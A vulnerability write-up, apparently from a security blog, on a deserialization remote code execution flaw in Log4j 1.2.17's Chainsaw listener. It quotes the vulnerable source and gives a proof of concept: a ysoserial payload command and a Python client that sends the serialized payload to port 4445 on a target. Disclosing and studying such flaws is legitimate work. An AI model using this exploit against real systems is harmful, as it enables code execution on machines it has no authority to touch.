Log4j1.2.17 RCE

Vulnerability discovered in early 2020.

After reading CVE-2019-17571, I found that there is another vulnerability under chainsaw,there is a deserialization process for socket data in the LoggingReceiver class, and the lack of verification leads to the occurrence of vulnerabilities

Vulnerability analysis:
Set the listening port in the setupReceiver method on line 133 of src/main/java/org/apache/log4j/chainsaw/Main.java

1
2
3
4
5
6
7
8
9
10
11
12
13
private void setupReceiver(MyTableModel aModel) {
        int port = 4445;
        String strRep = System.getProperty("chainsaw.port");
        if (strRep != null) {
            try {
                port = Integer.parseInt(strRep);
            } catch (NumberFormatException var6) {
                LOG.fatal("Unable to parse chainsaw.port property with value "+ strRep + ".");
                JOptionPane.showMessageDialog(this, "Unable to parse port number from'" + strRep + "', quitting.", "CHAINSAW", 0);
                System.exit(1);
            }
        }

Then go to the LoggingReceiver class to process related connection information:

1
2
3
4
try {
            LoggingReceiver lr = new LoggingReceiver(aModel, port);
            lr.start();

Follow up LoggingReceiver class,get the data in the run method, encapsulate the mClient data into the ObjectInputStream object, Deserializing the ois object triggers the vulnerability:
src/main/java/org/apache/log4j/chainsaw/LoggingReceiver.java

1
2
3
4
5
6
7
8
9
10
11
12

public void run() {
            LoggingReceiver.LOG.debug("Starting to get data");

            try {
                ObjectInputStream ois = new ObjectInputStream(this.mClient.getInputStream());

                while(true) {
                    LoggingEvent event = (LoggingEvent)ois.readObject();
                    LoggingReceiver.this.mModel.addEvent(new EventDetails(event));
                }

Vulnerability verification:
Start the visualization component

1
java -cp log4j-1.2.17.jar org.apache.log4j.chainsaw.Main

Sending the payload generated by ysoserial (https://github.com/angelwhu/ysoserial) to port 4445 of the target can trigger the vulnerability.

eg, generate malicious data exp.ser first:

1
java -jar ysoserial.jar Jdk7u21 "calc" > exp.ser

Write a python socket client after generating the data:

exp.py:

1
2
3
4
5
6
7
8
9
10
#coding:utf-8
import socket
s = socket.socket()
host = "172.20.10.14"#target ip
port = 4445#The listening port set by the component
s.connect((host,port))
ssss = open("exp.ser",'rb')//Malicious data
xc = ssss.read()
s.send(xc)
s.close()

running exp.py can trigger the vulnerability.

OR

Web demo:

1
2
3
4
5
6
public class Log4jVul {
    public static void main(String[] args) {
        String[] arg = {};
        Main.main(arg);
    }
}

When you run the above demo, you will be prompted:

1
2
3
[main] DEBUG org.apache.log4j.chainsaw.MyTableModel - Total time [ms]: 1 in update, size: 0
[Thread-4] INFO org.apache.log4j.chainsaw.LoggingReceiver - Thread started
[Thread-4] DEBUG org.apache.log4j.chainsaw.LoggingReceiver - Waiting for a connection

It will prompt to wait for a connection. At this time, sending malicious serialized data to port 4445 will trigger the vulnerability.

JAVA
JAVA反序列化

声明:
本文章用于学习交流,严禁用于非法操作,出现后果一切自行承担,阅读此文章表示你已同意本声明。

Disclaimer:
This article is for study and communication. It is strictly forbidden to use it for illegal operations. All consequences shall be borne by yourself. Reading this article means that you have agreed to this statement.